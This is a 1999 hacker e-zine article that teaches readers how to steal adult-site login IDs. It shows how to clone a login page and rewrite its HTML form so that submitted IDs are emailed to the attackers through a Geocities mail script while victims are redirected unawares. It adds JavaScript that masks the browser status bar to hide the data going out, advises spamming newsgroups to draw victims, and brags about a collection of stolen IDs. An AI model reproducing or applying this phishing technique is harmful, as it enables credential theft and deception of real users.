_________   SWAT MAGAZINE ISSUE FIFTEEN: MARCH 1999   __________
  /         \___________________________________________/          \
 /	     Stealing Adultpass ID's and other Login info	    \
/              By =The-Doh-Boy= & -=The Firestarter=-                \
-----------------------------------------------------------------------

Doh-Boy gave me the idea to this scam in an article he wrote for this
months issue, there was one or two flaws in it, so I improved on it
and incorperated as much of it in this file as I could.
First off we'll look at the login procedure Age check, I don't think
that agecheck and adultpass are the same company, but there login
procedure is very similar. What you would do is visit a web site that
usualy holds some sort of sick perverts fantasy pictures (usualy rape
or incest). You would then have to plug in your ID number and hit the
submit button, this would then be processed by the company, if your
ID was correct, then you would be forwarded to another web page which
would have all of the pictures or whatever was there. Each time you
enter this page the webmaster gets a small ammout of cash, I'm not too
sure of the exact ammount. So your probably thinking "Great I set up
a web page with an adultpass ID login and spam the newsgroups."
Well yeah you could do that, but what would that prove? I mean you'd
get a couple of quid out of it at the most. Doh-Boy had the idea of
hacking the sites which hosted these pages and altering the HTML code
so that the ID was e-mailed to an address on Hotmail. A good idea only
the problem with that it you would get the little "You are about to
submit information via e-mail...." Now that would be a bit suspect
now wouldn't it? and even when it was sent the person would remain on
the main page and not get anywhere. Now I had the idea when I was going
over some CGI script's looking at verious submission scripts and stuff
like that. That would submit the informaion without the victim knowing
that you'd stolen his ID, but what about the idea of getting the victim
to the other page? well I'm sure you've all seen the "click on the
banner to enter the web page" on the index page?. You should do, all
that is, is a simple javascript that opens two links at once. Now if
we where to incorpirate the idea of the CGI scripts with the javascript
we'd have a pretty effective way of stealing passwords. Now I don't
know the first thing about CGI programming, and what if I couldn't
get hosting on a site that allowed CGI scripts? and I sure as hell
ain't gonna host a scam on the SWATeam. So I looked into it a bit
more, how about posting informaion to an e-mail address via a CGI
script? so I looked into it, a similar exploit once worked for hacking
hotmail. So what would we have to do? well I'd have to incorpirate
the adultpass login screen along with the form  to send me the
ID and to send the victim to the other pages. This would be fairly
simple, first thing I needed was the HTML code for the adultpass login.
So a quick browsing of the newsgroups later I found a web site that
participated in the adultpass scheme. The HTML code isn't important.
I was more interested in the design of it all. So I opened up the page
and looked at the code, some of the code had to stay the same, I mean I
wanted it too look genuine. Now I came to this line:

<FORM ACTION="http://www.agecheck.com/check.cgi" METHOD="POST" 
ENCTYPE="x-www-form-urlencoded">

Ok all this does is to send the data to be checked, a point worth
noting. This is the part where I re-write the HTML code to send me
the ID. So I delete the line: 
<FORM ACTION="http://www.agecheck.com/check.cgi" METHOD="POST" 
ENCTYPE="x-www-form-urlencoded">

and I got to the line:

<INPUT TYPE='TEXT' SIZE='30' MAXLENGTH='30' NAME='id'><INPUT TYPE='SUBMIT'
VALUE='Submit'><INPUT TYPE='RESET' VALUE='Clear'>

That's the line where you input your ID number to gain access to the
main site.
I modify that line, to look like this:

<FORM METHOD="POST" ACTION="http://www.geocities.com/cgi-bin/homestead/mail.pl?swateam" TARGET="_top">
<INPUT TYPE="hidden" NAME="next-url" VALUE="http://www.mysite.com/~dir/sickporn">
<INPUT TYPE="hidden" NAME="subject" VALUE="ID">
<INPUT NAME="id" TYPE="TEXT" MAXLENGTH=30><INPUT NAME="submit" TYPE="SUBMIT" VALUE="Submit">
<INPUT NAME="reset" TYPE="RESET" VALUE="Clear"></FORM>

And there we have it. As soon as somebody puts in there ID and hits the
submit button the ID will get e-mailed the the swateam@geocities.com
e-mail address. Now it is a case of spamming all of the newsgroups
that deal with porn sites, something along the lines of:
"100% free hardcore porn! Adultpass id required" with a brief 
description as to the "content" of the site. The perverts are happy
and I have there ID. In fact I have somewhat of a collection of them,
a few weeks of that scam, with postings made almost everyday to all of
the newsgroups, the site got loads of hits, and I got loads of ID's.
But what would happen if they where to look in the status bar of there
browser? it would read "Contacting www.geocities.com..." Hmm, well
this little script pasted into the header of the page fixed that 
problem:

<SCRIPT LANGUAGE="JavaScript">
<!-- Hide the script from browsers that don't recognize it
function scrollit_r2l(seed)
{
        var msg  ="100% totaly free hardcore porn!";
        var out = " ";
        var c   = 1;

        if (seed > 100) {
                seed--;
                var cmd="scrollit_r2l(" + seed + ")";
                timerTwo=window.setTimeout(cmd,100);
        }
        else if (seed <= 100 && seed > 0) {
                for (c=0 ; c < seed ; c++) {
                        out+=" ";
                }
                out+=msg;
                seed--;
                var cmd="scrollit_r2l(" + seed + ")";
                    window.status=out;
                timerTwo=window.setTimeout(cmd,100);
        }
        else if (seed <= 0) {
                if (-seed < msg.length) {
                        out+=msg.substring(-seed,msg.length);
                        seed--;
                        var cmd="scrollit_r2l(" + seed + ")";
                        window.status=out;
                        timerTwo=window.setTimeout(cmd,100);
                }
                else {
                        window.status=" ";
                        timerTwo=window.setTimeout("scrollit_r2l(100)",75);
                }
        }
}
// script finished -->
</SCRIPT>
</HEAD>
<BODY onload="scrollit_r2l(99)">

Have fun with your new found knowledge, all in all it took me two hours
to get it right and have the ID e-mailed to me (after failed attempts
to add javascript).